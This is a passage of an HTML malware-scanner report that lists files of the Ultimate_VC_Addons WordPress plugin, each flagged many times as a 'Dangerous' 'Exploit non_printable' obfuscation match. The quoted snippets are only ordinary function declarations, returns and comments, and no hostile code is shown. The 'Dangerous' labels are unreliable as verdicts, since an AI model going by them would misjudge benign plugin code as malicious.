<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_exp_section_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_440").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_parallax.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 80.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 24</span><br><table id="file_441" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hex</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Parallax</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1778</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1825</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_theme_after_vc_row' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1834</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">vc_theme_after_vc_row</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">Ultimate_VC_Addons_Parallax</span><span style="color: #007700">::</span><span style="color: #0000BB">parallax_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1839</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'hex2rgbUltParallax' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1848</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hex2rgbUltParallax</span><span style="color: #007700">( </span><span style="color: #0000BB">$hex</span><span style="color: #007700">, </span><span style="color: #0000BB">$opacity </span><span style="color: #007700">) { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1860</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'rgba(' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #DD0000">','</span><span style="color: #007700">, array( </span><span style="color: #0000BB">$r</span><span style="color: #007700">, </span><span style="color: #0000BB">$g</span><span style="color: #007700">, </span><span style="color: #0000BB">$b </span><span style="color: #007700">) ) . </span><span style="color: #DD0000">',' </span><span style="color: #007700">. </span><span style="color: #0000BB">$opacity </span><span style="color: #007700">. </span><span style="color: #DD0000">')'</span><span style="color: #007700">;</span><span style="color: #FF8000">// returns the rgb values separated by commas, ready for usage in a rgba( rr,gg,bb,aa ) CSS rule.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1862</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #FF8000">// input string is not a valid hex color code - return a blank value; this can be changed to return a default colour code for example.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1866</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'rgbaToHexUltimate' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1876</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rgbaToHexUltimate</span><span style="color: #007700">( </span><span style="color: #0000BB">$r</span><span style="color: #007700">, </span><span style="color: #0000BB">$g</span><span style="color: #007700">, </span><span style="color: #0000BB">$b </span><span style="color: #007700">) { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1881</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hex</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Parallax</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">execute_ultimate_vc_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$output</span><span style="color: #007700">, </span><span style="color: #0000BB">$obj</span><span style="color: #007700">, </span><span style="color: #0000BB">$attr </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 477</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parallax_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 493</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_remove_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 506</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parallax_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_441").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_link.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_442" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } public function </span><span style="color: #0000BB">ultimate_createlink</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Creative Link' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_createlink'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'uvc_creative_link'</span><span style="color: #007700">, </span><span style="color: #DD0000">'category' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate VC Addons'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ultimate_vc' </span><span style="color: #007700">), </span><span style="color: #DD0000">'des</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Creative link Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Creative link module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to regester assets</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">creative_link_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 373</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_createlink</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_createlink_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_442").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 38.76 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_443" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons-info-box-style'</span><span style="color: #007700">, </span><span style="color: #DD0000">'info-box' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons-info_box_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'info-box' </span><span style="color: #007700">); } }} if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Ico</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_List_Icon</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">icon</span><span style="color: #007700">-</span><span style="color: #0000BB">box</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 344</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_boxes</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 886</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_443").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_spacer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_444" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
